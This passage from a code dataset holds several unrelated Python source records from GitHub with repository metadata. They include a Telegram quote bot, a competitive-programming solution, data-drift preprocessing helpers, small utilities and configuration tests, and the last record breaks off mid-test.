handle. \"\r\n \"But if you can't handle me at my worst, \"\r\n \"then you sure as hell don't deserve me at my best.”\"\r\n \"\\n\\n― Marilyn Monroe\")\r\n bot.send_message(message.chat.id, \"“Love never dies a natural death. \"\r\n \"It dies because we don't know how to replenish its source. \"\r\n \"It dies of blindness and errors and betrayals. \"\r\n \"It dies of illness and wounds; it dies of weariness, \"\r\n \"of witherings, of tarnishings.”\"\r\n \"\\n\\n― Anais Nin\")\r\n\r\n if message.text == \"Love\":\r\n photo = open('images/love.jpg', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“You know you're in love when you can't fall asleep because \"\r\n \"reality is finally better than your dreams.”\"\r\n \"\\n\\n― Dr. Seuss\")\r\n bot.send_message(message.chat.id, \"We accept the love we think we deserve.”\"\r\n \"\\n\\n― Stephen Chbosky\")\r\n bot.send_message(message.chat.id, \"“As he read, I fell in love the way you fall asleep: \"\r\n \"slowly, and then all at once.”\"\r\n \"\\n\\n― John Green\")\r\n bot.send_message(message.chat.id, \"“Love all, trust a few, do wrong to none.”\"\r\n \"\\n\\n― William Shakespeare\")\r\n bot.send_message(message.chat.id, \"“Love is that condition in which the happiness \"\r\n \"of another person is essential to your own.”\"\r\n \"\\n\\n― Robert A. Heinlein\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of love')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of love\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == \"More quotes on the topic of humor\":\r\n bot.send_message(message.chat.id, \"“Two things are infinite: the universe and human stupidity,\"\r\n \"and I'm not sure about the universe.”\"\r\n \"\\n\\n― Albert Einstein\")\r\n bot.send_message(message.chat.id, \"Everyone is out of place! I dropped my brains.\"\r\n \"\\n\\n― Pirates of the Caribbean\")\r\n bot.send_message(message.chat.id, \"“It’s no use going back to yesterday, \"\r\n \"because I was a different person then.”\"\r\n \"\\n\\n― Lewis Carroll\")\r\n bot.send_message(message.chat.id, \"“Be nice to nerds. You may end up working for them. We all could.”\"\r\n \"\\n\\n― Charles J. Sykes\")\r\n bot.send_message(message.chat.id, \"Everyone is out of place! I dropped my brains.\"\r\n \"\\n\\n― Pirates of the Caribbean\")\r\n bot.send_message(message.chat.id, \"“So many books, so little time.”\"\r\n \"\\n\\n― Frank Zappa\")\r\n\r\n if message.text == \"Humor\":\r\n sti = open('images/humor.webp', 'rb')\r\n bot.send_sticker(message.chat.id, sti)\r\n bot.send_message(message.chat.id, \"There are people who just want to approach and \"\r\n \"ask if it is difficult to live without brains.\"\r\n \"\\n\\n― Faina Ranevskaya\")\r\n bot.send_message(message.chat.id, \"“I love mankind ... it's people I can't stand!!”\"\r\n \"\\n\\n― Charles M. Schulz\")\r\n bot.send_message(message.chat.id, \"— Shut up.\"\r\n \"\\n— I didn't say anything.\"\r\n \"\\n— You were thinking. It's annoying.\"\r\n \"\\n\\n Sherlock― \")\r\n bot.send_message(message.chat.id, \"“Have no fear of perfection - you'll never reach it.”\"\r\n \"\\n\\n― Salvador Dali\")\r\n bot.send_message(message.chat.id, \"Theory is when you know everything and nothing works, \"\r\n \"practice is when everything works and nobody knows why. \"\r\n \"Here we combine theory with practice: \"\r\n \"nothing works and nobody knows why.\"\r\n \"― Albert Einstein\")\r\n markup_reply_humor = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_humor = types.KeyboardButton(text='More quotes on the topic of humor')\r\n markup_reply_humor.add(button1_humor)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of humor\"',\r\n reply_markup=markup_reply_humor)\r\n\r\n if message.text == \"More quotes on the topic of success\":\r\n bot.send_message(message.chat.id, \"“Success is getting what you want, happiness is wanting what you get”\"\r\n \"\\n\\n― W. P. Kinsella\")\r\n bot.send_message(message.chat.id, \"“Failure is the condiment that gives success its flavor.”\"\r\n \"\\n\\n― Truman Capote\")\r\n bot.send_message(message.chat.id, \"“Have no fear of perfection - you'll never reach it.”\"\r\n \"\\n\\n― Salvador Dali\")\r\n bot.send_message(message.chat.id, \"Success is stumbling from failure to \"\r\n \"failure with no loss of enthusiasm.”\"\r\n \"\\n\\n― Winston S. Churchill\")\r\n bot.send_message(message.chat.id, \"“Don't spend time beating on a wall, \"\r\n \"hoping to transform it into a door. ”\"\r\n \"\\n\\n― Coco Chanel\")\r\n\r\n if message.text == \"Success\":\r\n photo = open('images/success.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“Success is not final, failure is not fatal: \"\r\n \"it is the courage to continue that counts.”\"\r\n \"\\n\\n― Winston S. Churchill\")\r\n bot.send_message(message.chat.id, \"“I can't give you a sure-fire formula for success, \"\r\n \"but I can give you a formula for failure: \"\r\n \"try to please everybody all the time.”\"\r\n \"\\n\\n― Herbert Bayard Swope\")\r\n bot.send_message(message.chat.id, \"“If at first you don't succeed, try, try again. \"\r\n \"Then quit. No use being a damn fool about it.”\"\r\n \"\\n\\n― W.C. Fields\")\r\n bot.send_message(message.chat.id, \"“Try not to become a man of success. Rather become a man of value.”\"\r\n \"\\n\\n― Albert Einstein\")\r\n bot.send_message(message.chat.id, \"“It is better to fail in originality than to succeed in imitation.”\"\r\n \"\\n\\n― Herman Melville\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of success')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of success\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == \"More quotes on the topic of money\":\r\n bot.send_message(message.chat.id, \"“Too many people spend money they haven't earned, \"\r\n \"to buy things they don't want, \"\r\n \"to impress people that they don't like.”\"\r\n \"\\n\\n― Will Rogers\")\r\n bot.send_message(message.chat.id, \"“Libraries will get you through times of no money better\"\r\n \" than money will get you through times of no libraries.”\"\r\n \"\\n\\n― Anne Herbert\")\r\n bot.send_message(message.chat.id, \"“Making money isn't hard in itself... \"\r\n \"What's hard is to earn it doing something \"\r\n \"worth devoting one’s life to.”\"\r\n \"\\n\\n― Carlos Ruiz Zafón\")\r\n bot.send_message(message.chat.id, \"“The hardest thing in the world to understand is the income tax.”\"\r\n \"\\n\\n― Albert Einstein\")\r\n bot.send_message(message.chat.id, \"“Money may not buy happiness, \"\r\n \"but I'd rather cry in a Jaguar than on a bus.”\"\r\n \"\\n\\n― Françoise Sagan\")\r\n\r\n if message.text == \"Money\":\r\n photo = open('images/money.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“Anyone who lives within their means \"\r\n \"suffers from a lack of imagination.”\"\r\n \"\\n\\n― Oscar Wilde\")\r\n bot.send_message(message.chat.id, \"“Everyone wants to ride with you in the limo, \"\r\n \"but what you want is someone who will take \"\r\n \"the bus with you when the limo breaks down.”\"\r\n \"\\n\\n― Oprah Winfrey\")\r\n bot.send_message(message.chat.id, \"“A Penny Saved is a Penny Earned”\"\r\n \"\\n\\n― Benjamin Franklin\")\r\n bot.send_message(message.chat.id, \"“Wealth consists not in having great possessions, \"\r\n \"but in having few wants.”\"\r\n \"\\n\\n― Epictetus\")\r\n bot.send_message(message.chat.id, \"“While money can't buy happiness, \"\r\n \"it certainly lets you choose your own form of misery.”\"\r\n \"\\n\\n― Groucho Marx\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of money')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of money\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == \"More quotes on the topic of Inspirational\":\r\n bot.send_message(message.chat.id, \"“You never have to change anything \"\r\n \"you got up in the middle of the night to write.”\"\r\n \"\\n\\n― Saul Bellow\")\r\n bot.send_message(message.chat.id, \"“The unexamined life is not worth living.”\"\r\n \"\\n\\n― Socrates\")\r\n bot.send_message(message.chat.id, \"“Pain is temporary. Quitting lasts forever.”\"\r\n \"\\n\\n― Lance Armstrong Sally Jenkins\")\r\n bot.send_message(message.chat.id, \"“I was never really insane except \"\r\n \"upon occasions when my heart was touched.”\"\r\n \"\\n\\n― Edgar Allan Poe\")\r\n bot.send_message(message.chat.id, \"“Don't be pushed around by the fears in your mind. \"\r\n \"Be led by the dreams in your heart.”\"\r\n \"\\n\\n― Roy T. Bennett\")\r\n\r\n if message.text == \"Inspirational\":\r\n photo = open('images/Inspirational.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“Do one thing every day that scares you.”\"\r\n \"\\n\\n― Eleanor Roosevelt\")\r\n bot.send_message(message.chat.id, \"“We are what we pretend to be, \"\r\n \"so we must be careful about what we pretend to be.”\"\r\n \"\\n\\n― Kurt Vonnegut\")\r\n bot.send_message(message.chat.id, \"“Sometimes you wake up. Sometimes the fall kills you. \"\r\n \"And sometimes, when you fall, you fly.”\"\r\n \"\\n\\n― Neil Gaiman, Fables & Reflections\")\r\n bot.send_message(message.chat.id, \"“What's meant to be will always find a way”\"\r\n \"\\n\\n― Trisha Yearwood\")\r\n bot.send_message(message.chat.id, \"“The flower that blooms in adversity \"\r\n \"is the rarest and most beautiful of all.”\"\r\n \"\\n\\n― Walt Disney Company\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of Inspirational')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic '\r\n 'of Inspirational\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Больше цитат':\r\n bot.send_message(message.chat.id, 'Не совершай классическую ошибку всех умников: не думай, '\r\n 'что нет людей умнее тебя.'\r\n '\\n\\n- Области тьмы')\r\n bot.send_message(message.chat.id, '— Это не ответ.'\r\n '— Нет, это ответ. Просто это не то, что вы хотите услышать.'\r\n '\\n\\n- Неадекватные люди')\r\n bot.send_message(message.chat.id, 'Денег, которые я заработал, хватит мне до конца жизни, '\r\n 'если я умру сегодня в 16.00.'\r\n '\\n\\n- Хенни Янгман')\r\n bot.send_message(message.chat.id, 'Иногда момент, который ты так долго ждал, '\r\n 'приходит в самое неподходящее время...'\r\n '\\n\\n- Клиника')\r\n bot.send_message(message.chat.id, 'Ничто так не выдает человека, как то, над чем он смеётся.'\r\n '\\n\\n- Иоганн')\r\n\r\n if message.text == 'Жизненные':\r\n photo = open('images/life.jpg', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Проще расстаться с человеком, чем с иллюзиями на его счёт.'\r\n '\\n\\n- Марта Кетро')\r\n bot.send_message(message.chat.id, 'Такой вот парадокс: мы совершаем подвиги для тех, '\r\n 'кому до нас уже нет никакого дела, а любят нас те, '\r\n 'кому мы нужны и без всяких подвигов...'\r\n '\\n\\n- Смешарики')\r\n bot.send_message(message.chat.id, 'Самое худшее, когда нужно ждать и не можешь ничего сделать. '\r\n 'От этого можно сойти с ума.'\r\n '\\n\\n- Эрих Мария Ремарк')\r\n bot.send_message(message.chat.id, 'Сильные люди не любят свидетелей своей слабости.'\r\n '\\n\\n- Маргарет Митчел')\r\n bot.send_message(message.chat.id, 'Как же неприятно потратить на человека так '\r\n 'много времени лишь для того, чтобы узнать,'\r\n ' что он так и остался для тебя лишь посторонним.'\r\n '\\n\\n- Вечное сияние чистого разума')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Любовь':\r\n photo = open('images/love.jpg', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Если человек умер, его нельзя перестать любить, черт возьми. '\r\n 'Особенно если он был лучше всех живых, понимаешь?'\r\n '\\n\\n- Джером Дэвид')\r\n bot.send_message(message.chat.id, 'У самого злого человека расцветает лицо, когда ему говорят, '\r\n 'что его любят. Стало быть, в этом счастье...'\r\n '\\n\\n- Лев Николаевич Толстой')\r\n bot.send_message(message.chat.id, 'Кому-то не хватает одной женщины, '\r\n 'и он переключается на пятую, десятую. '\r\n 'А другому не хватает жизни, чтобы любить одну-единственную.'\r\n '\\n\\n- Константин Хабенский')\r\n bot.send_message(message.chat.id, 'Влюбиться можно в красоту, но полюбить – лишь только душу!'\r\n '\\n\\n- Уильям Шекспир')\r\n bot.send_message(message.chat.id, 'В идеальных отношениях чистая любовь и грязный секс дополняют, '\r\n 'а не исключают друг друга.'\r\n '\\n\\n- Брайанна Рид')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Смешные':\r\n photo = open('images/humor.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Теория — это когда все известно, но ничего не работает.'\r\n ' Практика — это когда все работает, но никто не знает почему. '\r\n 'Мы же объединяем теорию и практику: ничего не работает... '\r\n 'и никто не знает почему!'\r\n '\\n\\n- Альберт Эйнштейн')\r\n bot.send_message(message.chat.id, 'Есть такие люди, к которым просто хочется подойти и'\r\n ' поинтересоваться, сложно ли без мозгов жить.'\r\n '\\n\\n- Фаина Раневская')\r\n bot.send_message(message.chat.id, 'Все это видели?! Ибо я отказываюсь это повторять!'\r\n '\\n\\n- Капитан Джек Воробей')\r\n bot.send_message(message.chat.id, 'Меня вообще-то сложно удивить... О! Синяя машина!'\r\n '\\n\\n- Симпсоны')\r\n bot.send_message(message.chat.id, '— О, Господи!..'\r\n '\\n— Зови меня просто Дин.'\r\n '\\n\\n- Дин Винчестер')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Мотивирующие':\r\n photo = open('images/Inspirational.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Обязательно дружите с теми, кто лучше вас.'\r\n ' Будете мучиться, но расти.'\r\n '\\n\\n- Вера Полозкова')\r\n bot.send_message(message.chat.id, 'Столько есть всего, о чём надо подумать. '\r\n 'Зачем забивать себе голову тем, чего уже не вернёшь, '\r\n '— надо думать о том, что ещё можно изменить.'\r\n '\\n\\n- Скарлетт')\r\n bot.send_message(message.chat.id, 'Если ты плачешь не от счастья, то перестань.'\r\n '\\n\\n- Футурама')\r\n bot.send_message(message.chat.id, 'Все, что делаешь, надо делать хорошо, даже если совершаешь'\r\n ' безумство.'\r\n '\\n\\n- Оноре Де Бальзак')\r\n bot.send_message(message.chat.id, 'Ты — это то, что ты делаешь. '\r\n 'Ты — это твой выбор. Тот, в кого себя превратишь.'\r\n '\\n\\n- Джонни Деп')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Деньги':\r\n photo = open('images/money.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, '— И сколько же это будет стоить?'\r\n '\\n— Это бесплатно!'\r\n '\\n— Звучит дороговато.'\r\n '\\n\\n- Симпсоны')\r\n bot.send_message(message.chat.id, 'Для того, чтобы понять, что счастье не в деньгах, '\r\n 'нужно сперва узнать и то, и другое – счастье и деньги.'\r\n '\\n\\n- Фредрик Бегбедер')\r\n bot.send_message(message.chat.id, 'Не лажу с бытом! Деньги мешают мне и когда их нет, и когда они есть.'\r\n '\\n\\n- Фаина Раневская')\r\n bot.send_message(message.chat.id, 'Деньги нужно срочно пропить, так как потом их просто не будет...'\r\n '\\n\\n- Наруто')\r\n bot.send_message(message.chat.id, 'Это только кажется, что за всё платят деньгами. '\r\n 'За всё действительно важное платят кусочками души.'\r\n '\\n\\n- Дмитрий Емец')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Мужественность':\r\n photo = open('images/success.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Всякий мужественный, всякий правдивый человек приносит честь '\r\n 'своей родине.'\r\n '\\n\\n- Роман Роллан')\r\n bot.send_message(message.chat.id, 'Мужчины любят быть более мужественными, чем тот, '\r\n 'с к��м они находятся вместе. '\r\n 'То же происходит с некоторыми женщинами.'\r\n '\\n\\n- Эрик Берн')\r\n bot.send_message(message.chat.id, 'Выбирая между гордостью и ответственностью, '\r\n 'мужчина почти всегда выберет гордость —'\r\n ' если ответственность отнимает его мужественность.'\r\n '\\n\\n- Стивен Кинг')\r\n bot.send_message(message.chat.id, 'Быть несгибаемым, как пень, помогут жизненные бури.'\r\n '\\n\\n- Геннадий')\r\n bot.send_message(message.chat.id, 'Боль – это пустяк. Поражение – тоже пустяк. '\r\n 'Очень скоро вы в этом убедитесь!'\r\n '\\n\\n- Эрин Хантер')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n\r\nbot.polling(none_stop=True, interval=0)\r\n","repo_name":"Kalnazar/QuoteTelegramBot","sub_path":"quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":40124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18325316381","text":"import sys\nimport math\nimport bisect\nfrom heapq import heapify, heappop, heappush\nfrom collections import deque, defaultdict, Counter\nfrom functools import lru_cache\nfrom itertools import accumulate, combinations, permutations\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\nMOD99 = 998244353\n\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\nSMI = lambda: input().split()\nSLI = lambda: list(SMI())\nEI = lambda m: [NLI() for _ in range(m)]\n\n\ndef main():\n N, M, K = NMI()\n S = SI()\n\n total = S.count(\"x\")\n # L[i]: 左からi個までxを変えられるときに何個oが続くか\n L = [N] * (total+1)\n cnt = 0\n for i, s in enumerate(S):\n if s == \"x\":\n L[cnt] = i\n cnt += 1\n\n if total * M == K:\n print(N * M)\n exit()\n\n # print(L)\n ans = 0\n x = 0\n for i, s in enumerate(S):\n tmp = 0\n if i == 0:\n k, r = divmod(K, total)\n tmp += k * N + L[r]\n\n elif S[i-1] == \"x\":\n k, r = divmod(K, total)\n if k >= M:\n continue\n if k == M-1:\n if r > total - x:\n continue\n\n if r < total - x:\n tmp = i + k * N + (L[x+r] - i) - i\n else:\n tmp = i + k * N + (N-i) + L[r-(total-x)] - i\n\n if s == \"x\":\n x += 1\n\n ans = max(ans, tmp)\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC300/ABC300F.py","file_name":"ABC300F.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35275867181","text":"def counter(days):\r\n years = int(days/365)\r\n days = days%365\r\n months = int(days/30)\r\n day = int(days%30)\r\n\r\n return years, months, day\r\n\r\nresult = counter(4000)\r\nprint(str(result[0])+ \" years, \"+ str(result[1])+ \" months and \"+ str(result[2])+ \" days\")\r\n","repo_name":"farhann-farooq/cse111_lab_sloves","sub_path":"Assignment 2/fn_8.py","file_name":"fn_8.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"3071743928","text":"\nimport pandas as pd\nimport numpy as np\nfrom config import *\n\ndef get_data(dir, file_name):\n \"\"\"\n :param dir: directory from which file is loaded\n :param file_name: file to load\n :return: dataset for drift detection, without irrelevant column, and\n with time column formatted as such.\n \"\"\"\n df = pd.read_csv(f'{dir}/{file_name}?raw=true')\n df['created_at'] = pd.to_datetime(df[TIME_COL])\n\n df = df.drop('order_id', axis=1)\n\n return df\n\ndef ohe(data, col_to_ohe):\n \"\"\"\n replace categorical columns with one hot encoded dataframe\n :param data: dataframe with categorical columns\n :param col_to_ohe: what column to transform\n :return: dataframe with ohe instead of categorical data\n \"\"\"\n return pd.get_dummies(data, columns=col_to_ohe)\n\n\ndef get_batch(data):\n \"\"\"\n Divides data into batches of samples within same time frame (TIME_COL).\n :param data: dataframe with time column.\n :return: input dataframe, with batch column added.\n \"\"\"\n data.sort_values(TIME_COL, inplace=False)\n data['batch'] = data.groupby(TIME_COL).cumcount() // BATCH_SIZE\n\n return data\n\n\ndef to_batch(cat_data, num_data):\n \"\"\"\n Aggregates data into one sample of time X batch.\n For categorical data, values are counted\n For numerical data, values are averaged\n :param cat_data: dataframe of categorical features. must include time and batch columns\n :param num_data: dataframe of numerical features. must include time and batch columns\n :return: one dataframe where each line is the aggregate measure of its time X batch\n \"\"\"\n\n batched_num = num_data.groupby([TIME_COL, 'batch'])\\\n .mean().reset_index()\n batched_cat = cat_data.groupby([TIME_COL, 'batch'])\\\n .sum().reset_index()\n\n batched = batched_num.merge(\n batched_cat,\n left_on=['batch', 'created_at'],\n right_on=['batch', 'created_at']\n )\n\n batched = batched.drop('batch', axis=1)\n\n return batched\n\n\ndef split_cat_num(data, CAT_FEATURES):\n \"\"\"\n :param data: dataframe of numerical and categorical features.\n :param CAT_FEATURES: categorical features to be split from numerical.\n names must be included in the columns of initial dataframe\n :return: 2 dataframes: categorical, and numeric\n \"\"\"\n\n cat_data = data[[TIME_COL, 'batch']+CAT_FEATURES]\n num_data = data.drop(CAT_FEATURES, axis=1)\n\n return cat_data, num_data\n\n\ndef split_date_data(data, time_col):\n \"\"\"\n :param data: dataframe of features to test for drift\n :param time_col: name of column in dataframe 'data' indexing time\n :return: 2 dataframes of features and their corresponding stream time\n \"\"\"\n\n dates = data[time_col]\n data = data.drop(time_col, axis=1)\n\n return dates, data\n\n\ndef editting(data):\n \"\"\"\n function to pipe some of our function in order to transform the data\n :param data: raw data\n :return: processed dataframe to feed to detector\n \"\"\"\n data = data.drop('score', axis=1)\n with_batches = get_batch(data)\n cat_data, num_data = split_cat_num(with_batches, CAT_FEATURES)\n oh_cat = ohe(cat_data, CAT_FEATURES)\n batched = to_batch(oh_cat, num_data)\n dates, data = split_date_data(batched, TIME_COL)\n return dates, data\n","repo_name":"DafnaKoby/home_test","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42022268663","text":"class Repository(object):\n __default = None\n\n def __init__(self, default, **kwargs):\n self.__dict__ = default.__dict__\n\n for key in kwargs:\n setattr(self, key, kwargs.get(key))\n\n\nclass FactoryRepository(object):\n def __init__(self, **kwargs):\n for key in kwargs:\n setattr(self, key, kwargs.get(key))\n","repo_name":"willy182/super-sanic","sub_path":"src/shared/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15760619273","text":"import cv2\nimport os\n\ninputDir = '/home/adeykin/projects/coloriser/timelaps/OVERFITcow_unet_nonBilinear'\noutputVideoPath = 'out.avi'\nout = cv2.VideoWriter(outputVideoPath, cv2.VideoWriter_fourcc('M','J','P','G'), 10, (224,224))\n\n\ndef readImages(path, index):\n i = 0\n while True:\n currentImgName = path + '/' + str(index) + '_' + str(i) + '.png'\n if not os.path.exists(currentImgName):\n return None\n yield cv2.imread(currentImgName)\n i += 10\n\n\nprint('hello')\nfor i in range(5):\n for img in readImages(inputDir, i):\n out.write(img)\nout.release()","repo_name":"Adeykin/imageColoriser","sub_path":"timelaps.py","file_name":"timelaps.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32744361985","text":"\nWAKE_WORDS = ['hey computer', 'okay computer', 'hello adam'] # that's the list of wake words\nWAKE_WORDS_RESPONSE = ['hearing', 'hey boss', 'hello', \"i'm here\"] # that's the list of wake words\n\n# Greeting inputs\nGREETING_INPUTS = ['hi', 'hey', 'hello', 'greetings', \"what's up\"]\n\n# Greeting responses\nGREETING_RESPONSES = ['howdy', 'whats good', 'hello', 'hey there']\n\n# list of months\nMONTH_NAMES = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September',\n 'October', 'November', 'December']\n\n# list of ordinal numbers\nORDINAL_NUMBERS = ['1st', '2nd', '3rd', '4th', '5th', '6th', '7th', '8th', '9th', '10th',\n '11th', '12h', '13h', '14th', '15th', '16th', '17th', '18th', '19th', '20th',\n '21st', '22nd', '23rd', '24th', '25th', '26th', '27th', '28th', '29th', '30th' '31st']\n\n\n","repo_name":"mayrinkdotcom/adam","sub_path":"src/python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43265051426","text":"\"\"\"\n9 - Faça uma função que receba duas strings e retorne a intercalação letra a letra da primeira com a segunda string.\nA string intercalada deve ser retornada na primeira string.\n\"\"\"\n\n\ndef funcao(primeira, segunda):\n letras1 = []\n for x in range(len(primeira)):\n letras1.append(primeira[x])\n\n letras2 = []\n for x in range(len(segunda)):\n letras2.append(segunda[x])\n\n final = []\n if len(letras1) > len(letras2):\n for x in range(len(letras1)):\n final.append(letras1[x])\n if len(letras2) > x:\n final.append(letras2[x])\n elif len(letras1) < len(letras2):\n for x in range(len(letras2)):\n if len(letras1) > x:\n final.append(letras1[x])\n final.append(letras2[x])\n else:\n for x in range(len(letras1)):\n final.append(letras1[x])\n final.append(letras2[x])\n return ''.join(final)\n\n\nprint(funcao('Yr', 'ui'))\nprint(funcao('Eecco', 'xríi'))\nprint(funcao('Maçã', 'Banana'))\n","repo_name":"Yuri-Santiago/curso-udemy-python","sub_path":"Seção 8/Exercícios/atv09.py","file_name":"atv09.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"29183189257","text":"import argparse\nimport os\nimport textwrap\nimport tempfile\n\nimport pytest\n\nfrom sepelib.core import config\n\n\ndef test_key_value_parsing():\n wrong_values = [\n 'asddsd', # no '='\n '1aaaa=1111', # starts with number\n ',aaaa=1111', # starts with comma,\n 'aaaa aaaa=1111' # key has spaces\n ]\n for i in wrong_values:\n with pytest.raises(ValueError):\n config._parse_key_value(i)\n good_values = [\n ('_A=B', ('_A', 'B')),\n ('port=23333', ('port', '23333')),\n (' port=8080', ('port', '8080'))\n ]\n for input_, output in good_values:\n assert config._parse_key_value(input_) == output\n\n\ndef test_augment_args_parser():\n parser = argparse.ArgumentParser()\n config.augment_args_parser(parser)\n namespace = parser.parse_args(args=[])\n assert namespace.config_context == []\n namespace = parser.parse_args(['-V', 'key=value', '-V', 'key1=value1'])\n assert namespace.config_context == [('key', 'value'), ('key1', 'value1')]\n # Now check that error values fail\n with pytest.raises(SystemExit):\n parser.parse_args(['-V', '111=value'])\n\n\ndef test_config_patched_with_jinja():\n text = textwrap.dedent(\"\"\"\n run:\n production: false\n auth: true\n web:\n http:\n port: {{ port }}\n ip: 0.0.0.0\n \"\"\")\n defaults = textwrap.dedent(\"\"\"\n log:\n file_path: /usr/local/www/logs/google_borg_{{ port }}.log\n \"\"\")\n context = {\n 'port': '8080'\n }\n config_fd = defaults_fd = None\n config_file_name = defaults_file_name = None\n try:\n config_fd, config_file_name = tempfile.mkstemp()\n defaults_fd, defaults_file_name = tempfile.mkstemp()\n # Write config files\n os.write(config_fd, text)\n os.write(defaults_fd, defaults)\n\n config.load(config_file_name, defaults=defaults_file_name, config_context=context)\n assert config.get_value('web.http.port') == 8080\n assert config.get_value('log.file_path') == '/usr/local/www/logs/google_borg_8080.log'\n finally:\n if config_fd is not None:\n os.close(config_fd)\n if config_file_name:\n os.remove(config_file_name)\n if defaults_fd is not None:\n os.close(defaults_fd)\n if defaults_file_name:\n os.remove(defaults_file_name)\n\n\ndef test_get_context_from_env():\n with pytest.raises(ValueError):\n 